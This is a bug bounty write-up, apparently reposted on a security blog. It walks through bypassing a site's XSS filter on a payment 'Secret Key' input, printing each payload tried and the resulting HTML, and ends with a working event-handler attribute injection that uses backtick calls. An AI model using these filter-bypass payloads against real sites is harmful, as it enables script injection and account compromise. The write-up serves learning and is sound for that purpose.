class="post-template-default single single-post postid-172 single-format-image custom-background wp-custom-logo right-sidebar hide-slider classic-logo-position "

Stored Xss Bypass Technic-Story Of a Stored XSS Bypass

stored xss byass

Story Of a Stored XSS Bypass

Stored Xss Bypass Technic

This post is published by Prial Islam on his blog at Medium and published here as a contributor on our blog .Note that the post is written by Prial Islam, & any mistake in writing will be entertained only from him We allow anyone to write contents on our blog as a guest/contributor so other can also learn.If you’re interested in sharing your finding through our Platform just Signup on blog and you can post freely.

Hi readers ,

I am a Cyber Security Researcher from Bangladesh . This is my 1st write-up and also I am not good at XSS so forgive all mistakes .

Recently I was testing a private site and in that site users can add their personal information . I noticed a Input there named Secret Key which allows user to process payments and store transaction information to an application.

So I input a Normal payload :-

“><img src=x onerror=prompt(document.domain)>

and it got filtered and the page source was like :-

<input type="text" id="****" name="****" value="">&lt;img img" class="form-control" rel="gp" data-size="20" data-character-set="a-z,A-Z,0-9">

So from the source I understand that :-

1. quot (“) and greater-than (>) signs are not being filtered properly .

2. Malicious tags are being filtered . For that <img> become img img

So I have 2 possible way to execute JavaScript . 1st one is somehow bypass the less than (<) filter and the 2nd one is adding a malicious HTML Attributesto execute JavaScript . I tried many way to bypass the less than(<) Character but was unable to do . So I processed with 2nd way by adding a Malicious HTML Attributes . So I entered below payload :-

“ OnMouseOver=prompt(1)

Response was :-

<input type="text" id="****" name="****" value="" OnMouseOver=prompt&#40;" class="form-control" rel="gp" data-size="20" data-character-set="a-z,A-Z,0-9">

So I was able to add a HTML Attributes but Brackets are being filtered properly . So I entered below payload :-

“ OnMouseOver=prompt`1`

Response was :-

<input type="text" id="****" name="****" value="" OnMouseOver=prompt`1`" class="form-control" rel="gp" data-size="20" data-character-set="a-z,A-Z,0-9">

But code Not executed . Take a closer look and the payload just need a quot (“) 🤔🤔🤔 :-

“ OnMouseOver=”prompt`1`

Response was :-

<input type="text" id="ipn_secret_keygen" name="ipn_secret_keygen" value=""OnMouseOver="alert`1`" class="form-control" rel="gp" data-size="20" data-character-set="a-z,A-Z,0-9">

Looks good . Now I took my Mouse pointer on the Input and the OnMouseOver Event executed the XSS Popup 🤩🤩🤩

stored xss bypass
                                                            Xss Executed

Thank You For Reading Stored Xss Bypass Writeup.More Bug Bounty Writeup Coming Soon.Stay With Us.Follow On Social Network Get Notification.If You Are New Bug Hunter Or Web Penetration Tester This Blog Site Help To You.And Also Share This Blog Post Your Friends Of Friends.Happy Hunting Be Smile.

Follow My Twitter Get New Post Notification.

Follow Twitter:- Follow Now || Click Here

Like  My Facebook Page Get New Post Notification.

Like Page:- Like Now || Click Here

Writeup Submit: Prial Islam Khan

Blog Author: Md Hridoy

Copyright By © Bug Bounty TuT



Leave a Reply

Your email address will not be published. Required fields are marked *